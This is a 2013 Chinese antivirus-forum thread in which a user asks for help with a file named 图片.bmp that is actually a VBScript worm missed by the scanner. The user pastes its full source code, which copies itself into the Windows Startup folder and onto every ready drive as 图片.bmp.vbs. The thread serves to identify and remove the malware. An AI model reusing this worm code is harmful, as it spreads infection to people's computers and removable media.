电脑中一个名为图片.bmp的文件用瑞星杀不到 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 可疑文件交流电脑中一个名为图片.bmp的文件用瑞星杀不到

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

电脑中一个名为图片.bmp的文件用瑞星杀不到

本主题由大版主 zgr稳得起于 2013-12-21 21:18:04 执行移动主题操作

AQ2006 初生襁褓狮帖子:7 注册: 2006-05-24 来自:	发表于： 2013-12-21 19:23 \| 只看楼主短消息资料字号：小中大 1楼电脑中一个名为图片.bmp的文件用瑞星杀不到文件类型为VBScript Script File 用记事本打开，代码如下： on error resume next set f=createobject("scripting.filesystemobject"):fp=wscript.scriptfullname:startp="C:\Documents and Settings\All Users\「开始」菜单\程序\启动\UserInit.vbs" f.copyfile fp,startp do while f.fileexists(fp) for each d in f.drives if d.isready then f.copyfile fp,d.path+"图片.bmp.vbs" end if next wscript.sleep 5000 loop set w=createobject("wscript.shell") w.run startp 用户系统信息：Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) 附件: 您所在的用户组无法下载或查看附件
AQ2006 初生襁褓狮帖子:7 注册: 2006-05-24 来自:	分享到：

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2013-12-23 09:10 \| 短消息资料字号：小中大 2楼回复：电脑中一个名为图片.bmp的文件用瑞星杀不到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动\UserInit.vbs 找到压缩发来。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

AQ2006 初生襁褓狮帖子:7 注册: 2006-05-24 来自:	发表于： 2013-12-27 09:51 \| 只看楼主短消息资料字号：小中大 3楼回复: 电脑中一个名为图片.bmp的文件用瑞星杀不到文件已经找到，并进行了压缩。附件: 您所在的用户组无法下载或查看附件
AQ2006 初生襁褓狮帖子:7 注册: 2006-05-24 来自:

AQ2006 初生襁褓狮帖子:7 注册: 2006-05-24 来自:	发表于： 2013-12-27 10:37 \| 只看楼主短消息资料字号：小中大 4楼回复：电脑中一个名为图片.bmp的文件用瑞星杀不到谢谢了，源文件已经删除了，硬盘其他盘中不再出现图片.bmp.vbs。
AQ2006 初生襁褓狮帖子:7 注册: 2006-05-24 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT